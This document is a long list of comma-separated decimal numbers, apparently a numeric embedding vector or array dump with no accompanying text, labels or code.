-0.01595890335738659, -0.026140354573726654, 0.0022654475178569555, -0.03036520816385746, 0.005288532469421625, -0.013107499107718468, -0.01818329654633999, -0.025901492685079575, -0.005486339330673218, -0.021975215524435043, 0.0023998068645596504, -0.0119057297706604, 0.010815925896167755, 0.057296790182590485, -0.0031462477054446936, 0.006076027639210224, 0.012487953528761864, -0.004930241033434868, -0.004896651022136211, -0.007874949835240841, -0.007628624327480793, -0.019915038719773293, 0.0346049927175045, -0.005807308945804834, -0.0443684384226799, 0.0022449204698204994, -0.01710842177271843, -0.009935125708580017, -0.007464407477527857, -0.014592916704714298, 0.034664709120988846, -0.015167675912380219, -0.026095567271113396, -0.03099221922457218, -0.005434088408946991, -0.020333046093583107, -0.007591302040964365, 0.0500115305185318, -0.017436856403946877, -0.000954511109739542, 0.0021385527215898037, -0.01634705252945423, 0.011860943399369717, 0.0068373968824744225, -0.014966136775910854, 0.0017494704807177186, 0.033559974282979965, 0.02004939876496792, -0.030395066365599632, 0.030663784593343735, 0.002444593468680978, 0.015249784104526043, -0.017362210899591446, -0.02218421921133995, -0.027887025848031044, -0.0211541298776865, -0.025155052542686462, -0.005687878467142582, -0.019631391391158104, -0.010017234832048416, -0.005493803881108761, 0.0022617154754698277, 0.045264165848493576, -0.03854620084166527, 0.017914578318595886, -0.01445109210908413, -0.0026834544260054827, -0.011442936025559902, -0.006550017278641462, -0.02036290243268013, 0.020900340750813484, -0.008501959964632988, 0.010390454903244972, 0.0005840898957103491, -0.002847671275958419, -0.010360597632825375, -0.010800997726619244, -0.004844400566071272, 0.018407229334115982, -0.01012173667550087, 0.021258631721138954, -0.02028825879096985, 0.0037657935172319412, 0.017018849030137062, 0.02543869987130165, 0.01658591255545616, -0.005736397113651037, -0.005956597160547972, 0.029394835233688354, -0.0030734697356820107, 0.005426624324172735, -0.029066402465105057, -0.05783422663807869, -0.01561554055660963, 0.008337742649018764, 0.032604530453681946, 0.014913885854184628, -0.04072580486536026, -0.009950054809451103, -0.017018849030137062, 0.028364747762680054, 0.010606923140585423, 0.016959132626652718, -0.009853017516434193, 0.004739898722618818, 0.00234195776283741, 0.0008028903394006193, 0.040666092187166214, -0.0049974205903708935, 0.017511500045657158, 0.007180759683251381, 0.01434659119695425, 0.012375987134873867, -0.002711446024477482, 0.014570523053407669, -0.008755750022828579, -0.018407229334115982, 0.015272177755832672, -0.00391881400719285, -0.02988748624920845, 0.002782357856631279, -0.02098991349339485, 0.01722785271704197, -0.002287840936332941, 0.01240584533661604, -0.006266369950026274, -0.007964522577822208, -0.01727263815701008, -0.01168926153331995, 0.004392803646624088, -0.0215870663523674, -0.0059715257957577705, -0.01718306541442871, -0.009315580129623413, -0.011525045149028301, -0.0016617636429145932, -0.017839932814240456, 0.005557251162827015, 0.002257983200252056, -0.029633697122335434, 0.00035339302849024534, -0.0074942647479474545, 0.0036109071224927902, 0.008509424515068531, -0.013256787322461605, -0.02055697701871395, -0.0016757594421505928, -0.018362442031502724, -0.024080177769064903, -0.006557481829077005, 0.006676912307739258, -0.004870525561273098, 0.05714750289916992, 0.046697333455085754, -0.01434659119695425, -0.007367370184510946, -0.02285601571202278, -0.03269410505890846, 0.02067640796303749, 0.0034373595844954252, 0.007456942927092314, 0.002146017039194703, 0.024274252355098724, 0.005023546051234007, -0.012129661627113819, -0.010091878473758698, -0.013480719178915024, 0.00503101060166955, 0.011121966876089573, -0.017929505556821823, 0.010188915766775608, 0.014174909330904484, 0.011144360527396202, 0.0017811942379921675, 0.011666868813335896, -0.0004870525735896081, -0.004769756458699703, -0.024751974269747734, -0.0248415470123291, -0.00762115977704525, 0.0007916936883702874, -0.01555582508444786, -0.04000922292470932, 0.007860020734369755, -0.012816387228667736, 0.0017084162682294846, 0.0000118162151920842, 0.0006596670136786997, 0.03179837390780449, -0.016018617898225784, 0.003416832536458969, -0.02222900465130806, 0.009435011073946953, -0.006773949600756168, 0.012301343493163586, -0.03215666487812996, -0.01651126891374588, -0.021646780893206596, 0.01639183796942234, -0.0008360136416740716, -0.02194535732269287, -0.01655605621635914, -0.018153438344597816, -0.025647703558206558, -0.002196401823312044, 0.012189377099275589, -0.01000230573117733, 0.013816618360579014, -0.007550247944891453, 0.0005113119259476662, 0.0054751429706811905, -0.030902646481990814, 0.03317182511091232, -0.00215907976962626, 0.023050090298056602, 0.00847210269421339, -0.006046169903129339, -0.0011868408182635903, -0.015988759696483612, 0.007486800663173199, 0.006546285003423691, 0.002847671275958419, 0.003151845885440707, 0.002597613725811243, 0.016406767070293427, -0.0014854170149192214, 0.01924324221909046, 0.012517810799181461, -0.02476690337061882, -0.0032171595375984907, 0.004497305490076542, 0.0032414188608527184, 0.016779987141489983, 0.004575681872665882, -0.016376908868551254, 0.010069485753774643, -0.015316964127123356, -0.011741512455046177, -0.009323044680058956, -0.0082183126360178, -0.006557481829077005, -0.018914807587862015, 0.0058782207779586315, 0.01583947241306305, 0.005262407008558512, -0.009867946617305279, -0.0033011341001838446, 0.001979934051632881, -0.009509654715657234, -0.014055479317903519, -0.02342331036925316, -0.006146939471364021, -0.004993688315153122, -0.012689492665231228, 0.04362199455499649, 0.0013081374345347285, -0.014324197545647621, 0.027409303933382034, -0.003956135828047991, 0.015287105925381184, 0.005818505305796862, -0.0015553958946838975, -0.04565231502056122, -0.005086993798613548, 0.006076027639210224, -0.024363825097680092, 0.0031667747534811497, -0.0024837814271450043, 0.008270563557744026, -0.008658712729811668, 0.0070687937550246716, -0.0007025873637758195, -0.025393914431333542, 0.006576142739504576, 0.020377831533551216, -0.009770909324288368, 0.009128970094025135, -0.003355251159518957, -0.032574672251939774, -0.025289412587881088, -0.0032787409145385027, 0.06049155816435814, 0.01921338401734829, 0.03335097059607506, -0.002024720422923565, 0.0001377416483592242, 0.017690645530819893, -0.044159434735774994, 0.006005115807056427, -0.0010618119267746806, 0.020452475175261497, -0.003706078277900815, -0.016302265226840973, 0.03281353414058685, -0.006277566775679588, 0.013577756471931934, 0.03490356728434563, -0.014630238525569439, -0.033709265291690826, 0.018272869288921356, -0.005434088408946991, 0.0031275865621864796, -0.019138740375638008, 0.012077410705387592, 0.006609732750803232, -0.0100620212033391, 0.015749899670481682, 0.029185833409428596, 0.005493803881108761, -0.00587448850274086, 0.013943512924015522, 0.012793994508683681, -0.007337512448430061, 0.034664709120988846, -0.012517810799181461, -0.02622992731630802, -0.00404944084584713, 0.00803916621953249, 0.01615297794342041, -0.04684662073850632, -0.011301112361252308, -0.010591994039714336, 0.03651588037610054, -0.004795881919562817, -0.016735201701521873, 0.016138048842549324, 0.0007497064070776105, 0.018705803900957108, -0.03953150287270546, -0.011398149654269218, -0.01015905849635601, -0.003821776481345296, -0.02139299176633358, 0.026976367458701134, -0.01478699129074812, 0.011219004169106483, 0.029917344450950623, -0.0073151192627847195, 0.02651357464492321, -0.023109804838895798, -0.011644475162029266, -0.01244316715747118, 0.012734279036521912, 0.012689492665231228, -0.01622762158513069, -0.007583837956190109, -0.02909625880420208, -0.001724278088659048, 0.009890339337289333, -0.007553980220109224, 0.007113580126315355, -0.024617616087198257, 0.01861623115837574, -0.021930428221821785, -0.021616922691464424, -0.009315580129623413, 0.021183988079428673, -0.015570753253996372, 0.016660556197166443, -0.007994379848241806, -0.03588886931538582, -0.004273373167961836, -0.0019892645068466663, -0.02110934443771839, -0.01549610961228609, 0.005516197066754103, -0.003892688313499093, 0.020064326003193855, -0.010136664845049381, -0.03430641442537308, 0.020870482549071312, 0.019422387704253197, -0.025647703558206558, -0.014615309424698353, -0.0021497493144124746, 0.0050048851408064365, -0.0162724070250988, -0.03591872751712799, 0.011204075068235397, 0.009002075530588627, 0.005579644348472357, 0.024826617911458015, 0.03418698534369469, 0.007121044676750898, 0.049474090337753296, -0.00006216451583895832, -0.0011280585313215852, 0.004844400566071272, -0.0029950933530926704, -0.005415427498519421, 0.01270442083477974, -0.019750822335481644, -0.007281529251486063, 0.01727263815701008, -0.03541114926338196, 0.021691568195819855, -0.0006204788805916905, -0.0002537898544687778, 0.007643552962690592, 0.027498876675963402, -0.005116851069033146, 0.035023000091314316, -0.010375525802373886, 0.007904807105660439, -0.016854632645845413, -0.019482102245092392, -0.007229278329759836, 0.030663784593343735, 0.00441519683226943, -0.0005836233613081276, 0.012166984379291534, -0.022094646468758583, 0.009606692008674145, -0.002002327237278223, -0.006912040989845991, -0.00015978496230673045, -0.018795378506183624, 0.018108652904629707, -0.011607153341174126, -0.020527120679616928, -0.016123119741678238, 0.04508502036333084, -0.009203614667057991, -0.007233010604977608, -0.01722785271704197, 0.005505000241100788, -0.013219465501606464, 0.015630468726158142, -0.008031702600419521, -0.03132065385580063, 0.009412617422640324, 0.01422716025263071, 0.014197302982211113, 0.01542146597057581, -0.014122658409178257, -0.004389071371406317, -0.019392529502511024, 0.008837858214974403, -0.011793763376772404, -0.03821776434779167, -0.01639183796942234, -0.020751051604747772, 0.01682477444410324, 0.017197994515299797, -0.009300651960074902, -0.017511500045657158, 0.0021329543087631464, 0.01304032001644373, -0.04194996878504753, 0.04386085644364357, -0.0031275865621864796, -0.021243702620267868, 0.021855784580111504, -0.0107935331761837, 0.0014117059763520956, -0.02345316857099533, 0.00624024448916316, 0.01304032001644373, -0.006273834500461817, -0.011308576911687851, 0.03968079015612602, 0.01928802765905857, 0.032126810401678085, -0.01168926153331995, -0.045503027737140656, -0.025140123441815376, 0.014966136775910854, -0.005340783391147852, -0.010786068625748158, 0.007986916229128838, 0.02043754793703556, -0.008927430957555771, 0.022005071863532066, 0.013488183729350567, -0.010338203981518745, -0.040904950350522995, -0.012428238056600094, -0.022258862853050232, -0.0029615035746246576, -0.01897452399134636, 0.011286184191703796, 0.005086993798613548, 0.023527812212705612, 0.016496339812874794, 0.0167053434997797, -0.01480191946029663, 0.008434779942035675, -0.00040214494219981134, 0.00021810065663885325, 0.031290795654058456, -0.015660326927900314, -0.01588425785303116, -0.01603354699909687, 0.017078563570976257, -0.015376678667962551, 0.0017280102474614978, -0.0007273131632246077, -0.013047783635556698, 0.023274021223187447, 0.012562597170472145, -0.01976575143635273, -0.01101746503263712, 0.002496844157576561, -0.004407732747495174, -0.018825234845280647, 0.003010022221133113, 0.02711072750389576, 0.009696264751255512, -0.0007007212261669338, 0.0035959782544523478, -0.006393264979124069, 0.009315580129623413, -0.00568414619192481, 0.023393452167510986, 0.0013491916470229626, 0.0021180256735533476, -0.020347975194454193, 0.03857605531811714, -0.01415251661092043, -0.017854861915111542, 0.007733126170933247, 0.02007925510406494, -0.026334429159760475, 0.0023251629900187254, 0.005146708805114031, 0.009748515672981739, 0.00739349564537406, 0.030215920880436897, 0.019825465977191925, -0.0019426119979470968, -0.020094184204936028, 0.015600611455738544, 0.003448556177318096, -0.01615297794342041, 0.007147170137614012, -0.02007925510406494, -0.04290541261434555, 0.005766254849731922, -0.00022159959189593792, 0.02452804334461689, 0.011980373412370682, -0.0011943051358684897, 0.03012634813785553, 0.008434779942035675, 0.003997189924120903, 0.021213846281170845, 0.01730249635875225, -0.01343593280762434, 0.00942754652351141, 0.009472332894802094, -0.03723246231675148, -0.006732895504683256, 0.022318577393889427, 0.007561444770544767, -0.014637703076004982, 0.016212692484259605, 0.01472727581858635, -0.005269871558994055, -0.008785607293248177, -0.02175128273665905, 0.021139200776815414, 0.011666868813335896, 0.024139894172549248, 0.01165193971246481, 0.03084293194115162, -0.03158937022089958, -0.015540895983576775, -0.004724969621747732, -0.010681566782295704, 0.004079298581928015, 0.010188915766775608, 0.021288489922881126, 0.005057136062532663, -0.017914578318595886, 0.014928814955055714, -0.03520214557647705, 0.0033030002377927303, 0.004448786843568087, 0.01658591255545616, -0.028752896934747696, 0.0044711800292134285, 0.016287336125969887, -0.008815465494990349, 0.029977058991789818, 0.020064326003193855, -0.005945400334894657, -0.01586933061480522, -0.015779757872223854, -0.021064557135105133, 0.0004898517508991063, 0.013965905643999577, -0.004609271418303251, -0.013316502794623375, -0.00962162110954523, 0.014585452154278755, -0.005710271652787924, 0.006396997254341841, 0.006027508992701769, 0.0011177950073033571, -0.007475603837519884, 0.013241858221590519, 0.007949593476951122, 0.022258862853050232, -0.0004072767333127558, -0.003665023948997259, -0.005900613963603973, -0.008688570000231266, -0.003058540867641568, 0.021094415336847305, -0.01365240104496479, -0.037411607801914215, 0.00010695095988921821, 0.007180759683251381, -0.01561554055660963, 0.01527964137494564, 0.01292088907212019, 0.02658821828663349, 0.0025509612169116735, -0.0013613213086500764, -0.006617197301238775, -0.003933742642402649, -0.02412496507167816, 0.03544100746512413, -0.019661249592900276, 0.0006974555435590446, 0.006438051350414753, -0.014831777662038803, -0.009420081973075867, -0.011084645055234432, -0.008360136300325394, 0.016481410712003708, 0.020377831533551216, 0.002810349455103278, 0.010472563095390797, -0.01409280113875866, -0.0017382738878950477, -0.00656867865473032, 0.05138498172163963, -0.0001644502190174535, 0.023721886798739433, 0.003818044438958168, -0.00029017883935011923, 0.011099573224782944, 0.006180529482662678, -0.00891250278800726, 0.00460553914308548, -0.0035997105296701193, 0.007792841177433729, 0.0019519425695762038, 0.022258862853050232, 0.021094415336847305, -0.007139705587178469, 0.006792610511183739, -0.004803346004337072, 0.008725891821086407, -0.006128278560936451, 0.0033496527466923, 0.0009335174108855426, -0.0033235272858291864, -0.012637241743505001, 0.015115424990653992, -0.008979681879281998, 0.012398380786180496, 0.007240475155413151, 0.016660556197166443, 0.027498876675963402, 0.011032394133508205, -0.014271946623921394, -0.014570523053407669, -0.009017003700137138, -0.0012764136772602797, 0.01178629882633686, -0.007927200756967068, 0.008681105449795723, 0.010800997726619244, -0.001950076431967318, 0.010778604075312614, 0.0018661018693819642, -0.010233702138066292, -0.004930241033434868, -0.01042031217366457, -0.009375295601785183, 0.007591302040964365, 0.006464176811277866, 0.0032283561304211617, -0.028155744075775146, 0.016003688797354698, -0.00010957516497001052, 0.006673180032521486, 0.0026330696418881416, 0.016332123428583145, 0.005915542598813772, 0.00476229190826416, -0.022214075550436974, 0.013450861908495426, 0.018601303920149803, -0.010248631238937378, 0.010681566782295704, 0.012726814486086369, 0.002774893306195736, -0.011659404262900352, 0.010927892290055752, -0.0064977663569152355, -0.005822237581014633, -0.020333046093583107, 0.012473024427890778, 0.004374142736196518, 0.013376218266785145, -0.0017476043431088328, 0.002414735732600093, -0.00984555296599865, 0.0021926695480942726, -0.01311496365815401, -0.001015159417875111, 0.012555133551359177, -0.0028402069583535194, 0.011928122490644455, 0.005124315619468689, -0.0021012306679040194, 0.03209695219993591, 0.0011439204681664705, -0.010591994039714336, 0.004482376389205456, -0.0015591280534863472, -0.01053974311798811, 0.005915542598813772, 0.006878451444208622, 0.014585452154278755, -0.00036902163992635906, 0.015018387697637081, 0.043681710958480835, -0.002369949361309409, -0.0037004798650741577, -0.01964632049202919, -0.008867715485394001, -0.007897342555224895, 0.007557712495326996, -0.004023315384984016, 0.01397337019443512, -0.013839011080563068, -0.027812382206320763, -0.009591763839125633, -0.00167482637334615, -0.005949132610112429, 0.013413540087640285, -0.0004634930519387126, -0.004418929107487202, 0.01928802765905857, -0.003788186702877283, 0.008942360058426857, -0.0027898221742361784, -0.01904916763305664, -0.0038479019422084093, 0.014234624803066254, 0.007102383766323328, -0.02651357464492321, -0.0010636780643835664, 0.007583837956190109, 0.025184910744428635, 0.013510577380657196, -0.04012865200638771, -0.004691380076110363, 0.013406075537204742, -0.028051242232322693, 0.004642861429601908, -0.005799844395369291, 0.026961438357830048, 0.00891250278800726, 0.03576944023370743, -0.0017606670735403895, 0.0007949593709781766, -0.0007193822530098259, 0.0000640889338683337, 0.008509424515068531, -0.0033608493395149708, 0.000888730981387198, 0.006848593708127737, 0.005680413916707039, 0.01498106587678194, -0.007016542833298445, 0.018661018460989, -0.01885509304702282, 0.016765058040618896, 0.029618768021464348, -0.00656867865473032, 0.006184261292219162, -0.005852095317095518, 0.02543869987130165, -0.013771831057965755, 0.0070687937550246716, -0.003347786609083414, -0.005803576670587063, -0.0019687374588102102, -0.012159519828855991, -0.009248401038348675, 0.019482102245092392, -0.0029129849281162024, -0.007609963417053223, -0.008031702600419521, -0.004900383297353983, -0.003275008639320731, 0.005419159773737192, 0.03672488406300545, 0.0034336273092776537, -0.0022020002361387014, 0.013323967345058918, 0.0010590128367766738, -0.004706308711320162, -0.01809372380375862, -0.0044413222931325436, 0.01778021827340126, 0.0081362035125494, 0.012301343493163586, 0.0014611576916649938, 0.019989682361483574, 0.003644496900960803, 0.014630238525569439, 0.014652631245553493, -0.0133986109867692, -0.025453628972172737, 0.009793302044272423, 0.013256787322461605, -0.009920197539031506, 0.01706363447010517, 0.037919189780950546, -0.011390685103833675, -0.003622103715315461, -0.019676176831126213, -0.00047398987226188183, -0.004575681872665882, -0.024856476113200188, 0.0019444781355559826, 0.02861853688955307, -0.0031854358967393637, -0.002228125697001815, 0.010285953059792519, -0.02670764923095703, -0.014630238525569439, 0.005001152865588665, 0.020945126190781593, 0.005837166681885719, -0.019004380330443382, 0.004228586796671152, -0.009084183722734451, -0.015234855003654957, -0.007792841177433729, 0.0023363595828413963, -0.012749208137392998, 0.002002327237278223, 0.013980834744870663, -0.02210957370698452, -0.0042173899710178375, -0.009449939243495464, -0.0020153899677097797, -0.0015768560115247965, 0.0025453628040850163, -0.026379214599728584, 0.012278949841856956, 0.008248169906437397, -0.0015423331642523408, -0.021139200776815414, -0.00030907310429029167, 0.024110035970807076, -0.006374604068696499, 0.017123350873589516, 0.007710732985287905, -0.01069649588316679, 0.004400268197059631, 0.0022374561522156, -0.010703960433602333, 0.0016057806788012385, -0.0003505938802845776, -0.0038553664926439524, 0.01813850924372673, -0.008434779942035675, 0.0013090703869238496, 0.0005299728945828974, -0.013950977474451065, -0.017914578318595886, -0.016138048842549324, 0.011442936025559902, 0.024154821410775185, 0.0011280585313215852, -0.006486569996923208, 0.015690183266997337, -0.004262176807969809, -0.000028982893127249554, -0.008128739893436432, 0.002353154355660081, -0.009711193852126598, -0.02469225972890854, 0.0141301229596138, 0.017795147374272346, 0.0031294526997953653, 0.009263329207897186, 0.01857144571840763, -0.026170212775468826, -0.011935587041079998, -0.008494495414197445, -0.010554672218859196, -0.010875641368329525, 0.032216381281614304, -0.005325854755938053, 0.006800075061619282, 0.02043754793703556, 0.019123811274766922, -0.029379907995462418, 0.011390685103833675, -0.003442957764491439, -0.008897573687136173, 0.022438008338212967, -0.007423352915793657, 0.001529270433820784, -0.008964752778410912, -0.030424924567341805, -0.02761830762028694, 0.0028383408207446337, 0.01349564827978611, -0.013144820928573608, -0.013092570006847382, -0.012816387228667736, -0.0005803576787002385, -0.0075315870344638824, -0.00827802810817957, 0.02254251018166542, 0.016287336125969887, 0.004598075058311224, -0.015093031339347363, -0.0022001340985298157, -0.006941898725926876, -0.01797429285943508, 0.0038049817085266113, -0.0028681985568255186, -0.021407920867204666, -0.004389071371406317, -0.0022561170626431704, -0.002970834029838443, -0.0004632597847376019, 0.01639183796942234, 0.022020000964403152, -0.008569139987230301, -0.008539281785488129, -0.003347786609083414, -0.0004317693237680942, 0.00431815953925252, -0.005751325748860836, 0.01995982602238655, 0.006870986893773079, 0.017168136313557625, 0.0031481138430535793, 0.018840163946151733, -0.00649030227214098, 0.005023546051234007, 0.004650325980037451, -0.0012652170844376087, -0.022915730252861977, 0.007038936018943787, -0.010338203981518745, -0.02342331036925316, 0.016839703544974327, 0.022214075550436974, 0.016108190640807152, 0.012876102700829506, 0.004079298581928015, -0.015048244968056679, -0.009673872031271458, 0.019706035032868385, 0.02019868604838848, -0.02072119526565075, -0.002002327237278223, 0.006236512213945389, -0.004926508758217096, -0.0011000670492649078, 0.003297401824966073, 0.008322814479470253, -0.01038299035280943, -0.00760249886661768, -0.009121505543589592, 0.018287798389792442, -0.017959363758563995, 0.021855784580111504, -0.009099112823605537, -0.01809372380375862, 0.00030137543217279017, 0.009957519359886646, -0.01530203502625227, -0.011995302513241768, 0.013144820928573608, 0.018153438344597816, -0.023363593965768814, 0.003071603598073125, -0.007076258305460215, 0.0004583612608257681, 0.00990526843816042, 0.014279411174356937, 0.005717736203223467, -0.015160211361944675, 0.0054303561337292194, -0.01833258382976055, -0.01579468511044979, 0.013943512924015522, 0.0006675979238934815, 0.0023176984395831823, 0.010300882160663605, -0.015451323240995407, -0.012084875255823135, 0.003892688313499093, 0.019900109618902206, -0.0009008606430143118, 0.009382760152220726, -0.0011121967108920217, 0.000873335637152195, 0.01679491624236107, 0.016451554372906685, 0.010256095789372921, -0.005758790299296379, 0.00397106446325779, 0.011196610517799854, -0.028200531378388405, -0.01921338401734829, -0.011181682348251343, 0.0026778560131788254, -0.010883105918765068, 0.009546976536512375, 0.010681566782295704, -0.003069737460464239, 0.004183800425380468, -0.03170880302786827, 0.01603354699909687, -0.0008938628016039729, -0.03084293194115162, -0.004926508758217096, 0.013831546530127525, 0.0017196128610521555, -0.030469710007309914, -0.009726122952997684, -0.008725891821086407, 0.008696034550666809, -0.03457513451576233, 0.007520390208810568, -0.003952403552830219, -0.005176566541194916, -0.003213427262380719, 0.01178629882633686, -0.010136664845049381, -0.000462326715933159, 0.010830854997038841, 0.017078563570976257, -0.006841129157692194, -0.022930659353733063, 0.025274483487010002, 0.019900109618902206, -0.006997881922870874, -0.036217305809259415, -0.009121505543589592, 0.01136829238384962, 0.0059715257957577705, -0.013085106387734413, -0.014563058502972126, -0.0013734509702771902, -0.0076883393339812756, 0.019631391391158104, 0.004056905396282673, 0.013727044686675072, 0.01280145812779665, 0.0002556559629738331, 0.0414423905313015, 0.01631719432771206, -0.019676176831126213, 0.010808461345732212, -0.005146708805114031, 0.019347744062542915, 0.01238345168530941, -0.008270563557744026, 0.0012064347974956036, 0.02790195494890213, -0.021766211837530136, 0.008248169906437397, 0.0038479019422084093, -0.02151242271065712, -0.027140585705637932, -0.03005170449614525, -0.023483024910092354, 0.025304341688752174, 0.012950746342539787, 0.007303922437131405, -0.020333046093583107, -0.013002997264266014, -0.004568217322230339, -0.02378160133957863, -0.024975907057523727, -0.0019239509711042047, -0.014010692946612835, -0.011457865126430988, 0.010114272125065327, -0.009166291914880276, -0.008069024421274662, -0.016302265226840973, -0.010905498638749123, 0.017033778131008148, 0.009957519359886646, -0.005534857977181673, 0.018675947561860085, -0.02182592637836933, -0.0028719305992126465, -0.007344976998865604, -0.013047783635556698, -0.018556516617536545, 0.013518041931092739, 0.007397227454930544, 0.013279180973768234, -0.02854389324784279, -0.005546054802834988, 0.002959637437015772, 0.028782755136489868, 0.01361507922410965, -0.006415658164769411, -0.010972678661346436, -0.007326315622776747, -0.010457634925842285, -0.02833488956093788, 0.011801227927207947, -0.014324197545647621, -0.011248861439526081, 0.007348708808422089, -0.015854401513934135, 0.013547899201512337, 0.012592455372214317, -0.004202461335808039, 0.018407229334115982, 0.02146763540804386, 0.002476317109540105, -0.0189297366887331, 0.0028700646944344044, -0.02658821828663349, 0.00863631907850504, 0.002147883176803589, 0.007740590255707502, -0.011980373412370682, -0.020153900608420372, 0.013861404731869698, 0.004568217322230339, -0.02409510686993599, -0.01530203502625227, 0.029126117005944252, 0.005086993798613548, 0.01849680207669735, -0.025901492685079575, 0.03603816032409668, 0.004825739189982414, 0.018362442031502724, -0.013585221022367477, -0.0014546263264492154, -0.008531817235052586, -0.003952403552830219, 0.013995763845741749, 0.022751513868570328, 0.012562597170472145, -0.015451323240995407, 0.004176335874944925, 0.000673196220304817, 0.0005047805607318878, 0.008942360058426857, 0.014831777662038803, -0.014712346717715263, -0.010009770281612873, 0.008979681879281998, -0.01057706493884325, -0.004329356364905834, 0.015809614211320877, -0.006635858211666346, 0.029738198965787888, -0.006990417372435331, -0.004139014054089785, -0.03084293194115162, 0.0018511730013415217, -0.028603609651327133, 0.007815234363079071, 0.01349564827978611, -0.008061559870839119, -0.0164366252720356, -0.010562136769294739, 0.009800766594707966, -0.006762753240764141, 0.005023546051234007, 0.011099573224782944, 0.009539512917399406, -0.0009666407713666558, 0.001880097552202642, 0.007363637909293175, 0.0018679678905755281, 0.01069649588316679, -0.011883336119353771, 0.017735430970788002, 0.006307424046099186, -0.009882875718176365, -0.01901930943131447, 0.007882414385676384, 0.003092130646109581, 0.0013939780183136463, -0.009263329207897186, 0.004027047660201788, 0.006322353146970272, -0.003512003691866994, -0.014570523053407669, -0.004863061476498842, -0.015600611455738544, -0.0029204492457211018, -0.0000052702798711834475, 0.009703729301691055, -0.0028084833174943924, -0.003431761171668768, -0.015115424990653992, -0.02107948623597622, -0.01770557463169098, -0.008106346242129803, 0.01057706493884325, 0.002351288218051195, -0.02742423303425312, 0.014264482073485851, -0.030156206339597702, 0.024617616087198257, 0.008083953522145748, 0.011950516141951084, -0.001179376384243369, 0.01727263815701008, -0.0012250958243384957, -0.013906191103160381, 0.013950977474451065, -0.020661478862166405, 0.009920197539031506, 0.007845091633498669, -0.005295997019857168, -0.0053445156663656235, 0.016376908868551254, -0.0005481673870235682, 0.017317425459623337, 0.013264251872897148, -0.009226007387042046, 0.014898956753313541, 0.002229991601780057, -0.010405384004116058, -0.002229991601780057, -0.00011803094093920663, -0.02036290243268013, -0.01403308566659689, -0.0007455076556652784, 0.02199014462530613, -0.0004114754556212574, 0.020303187891840935, 0.0009484462789259851, -0.03326139971613884, -0.0012083009351044893, -0.026214998215436935, 0.011189146898686886, 0.0010627449955791235, 0.007874949835240841, 0.022647012025117874, -0.0006447382038459182, 0.001026356010697782, -0.0013221331173554063, -0.006680644582957029, 0.027528734877705574, 0.012517810799181461, -0.009352901950478554, -0.0030734697356820107, -0.00552739342674613, -0.001417304389178753, 0.0018577043665573, 0.02143777720630169, 0.0013799823354929686, 0.003616505302488804, 0.009711193852126598, -0.031887948513031006, 0.033082254230976105, 0.002927913796156645, -0.009143899194896221, 0.000508979253936559, -0.015525966882705688, 0.008524353615939617, -0.0008173526148311794, -0.02048233337700367, -0.008083953522145748, -0.015175140462815762, -0.016839703544974327, 0.01355536375194788, -0.016481410712003708, 0.010942821390926838, -0.012465559877455235, -0.009345438331365585, -0.013107499107718468, -0.0100620212033391, 0.00841238722205162, -0.017168136313557625, -0.02258729562163353, -0.0017886585555970669, -0.0040009221993386745, -0.007497997023165226, 0.022617153823375702, -0.014779526740312576, -0.0005332385771907866, 0.04326370358467102, -0.010397919453680515, 0.0017821271903812885, 0.01976575143635273, -0.01588425785303116, 0.0057849157601594925, 0.005564715713262558, -0.0033608493395149708, 0.00990526843816042, 0.018108652904629707, -0.014936278574168682, -0.017839932814240456, -0.00777791254222393, -0.0012801458360627294, 0.00873335637152195, 0.0031350511126220226, -0.0031798374839127064, 0.011338435113430023, -0.005512464791536331, -0.011666868813335896, -0.00001215153042721795, -0.0010748746572062373, -0.004445054568350315, -0.015025852248072624, 0.044159434735774994, -0.011681796982884407, 0.020109113305807114, 0.0025621578097343445, 0.005982722621411085, -0.0071919565089046955, -0.00047865512897260487, 0.012614848092198372, 0.015779757872223854, 0.008837858214974403, -0.018959594890475273, -0.0021385527215898037, -0.008808000944554806, 0.016884488984942436, 0.005083261523395777, -0.0024277984630316496, 0.00635221041738987, -0.01323439460247755, -0.012077410705387592, 0.006703037768602371, -0.0007851623231545091, 0.038128193467855453, -0.008531817235052586, -0.008606461808085442, -0.005370641127228737, -0.012159519828855991, 0.0015787221491336823, 0.0029017883352935314, -0.029126117005944252, 0.009255864657461643, -0.005157905630767345, 0.0075390515848994255, -0.011069715954363346, -0.016839703544974327, 0.01073381770402193, 0.00679634278640151, -0.01770557463169098, 0.003881491720676422, 0.0067590209655463696, 0.001569391693919897, 0.0009713059989735484, -0.010823390446603298, 0.016600841656327248, -0.010196380317211151, 0.0065276240929961205, -0.008106346242129803, -0.008054095320403576, -0.01655605621635914, -0.014197302982211113, 0.003756463062018156, 0.00614320719614625, 0.021572137251496315, -0.010681566782295704, -0.023557670414447784, 0.02634935826063156, 0.010308346711099148, -0.0162724070250988, -0.004627932328730822, 0.0074084242805838585, 0.008934895507991314, -0.00420619361102581, 0.004859329201281071, -0.014973601326346397, 0.0070613292045891285, -0.0016617636429145932, 0.01667548529803753, -0.005083261523395777, -0.009390224702656269, 0.015645397827029228, 0.016735201701521873, 0.012891031801700592, -0.022870944812893867, 0.030335351824760437, -0.003622103715315461, -0.02306501939892769, -0.0011635144473984838, 0.003952403552830219, -0.011547437869012356, 0.006426854524761438, -0.006583607289940119, -0.021004842594265938, 0.00603124126791954, 0.022020000964403152, 0.0023662170860916376, 0.012017696164548397, 0.0035474596079438925, -0.00441519683226943, 0.0013930450659245253, -0.01174897700548172, 0.015451323240995407, -0.012682028114795685, -0.0021329543087631464, -0.006367139518260956, 0.0020191222429275513, -0.010942821390926838, -0.01115182414650917, -0.0046951123513281345, 0.0033515188843011856, -0.016376908868551254, -0.014264482073485851, -0.003149979980662465, 0.009158827364444733, -0.019974753260612488, 0.0022225272841751575, 0.0028737967368215322, 0.008203383535146713, 0.013443397358059883, -0.012592455372214317, 0.0346049927175045, 0.003941207192838192, -0.004176335874944925, 0.002433396875858307, 0.007792841177433729, -0.008188454434275627, 0.000591087737120688, -0.01136829238384962, 0.027648163959383965, -0.0014714213320985436, 0.01957167685031891, 0.0037639273796230555, 0.010584529489278793, 0.0025285680312663317, 0.01345832645893097, -0.027991527691483498, -0.016167907044291496, 0.0018259806092828512, -0.005643092095851898, 0.020273329690098763, 0.018481872975826263, 0.014122658409178257, 0.019915038719773293, -0.0017112153582274914, 0.0038479019422084093, 0.00863631907850504, 0.014898956753313541, 0.008479566313326359, 0.004598075058311224, 0.026289641857147217, -0.004445054568350315, 0.01313735730946064, -0.0010123602114617825, 0.033679407089948654, -0.014973601326346397, -0.02940976433455944, 0.017317425459623337, 0.02321430668234825, -0.016959132626652718, 0.007748054806143045, -0.0022393222898244858, 0.009800766594707966, -0.012667099013924599, 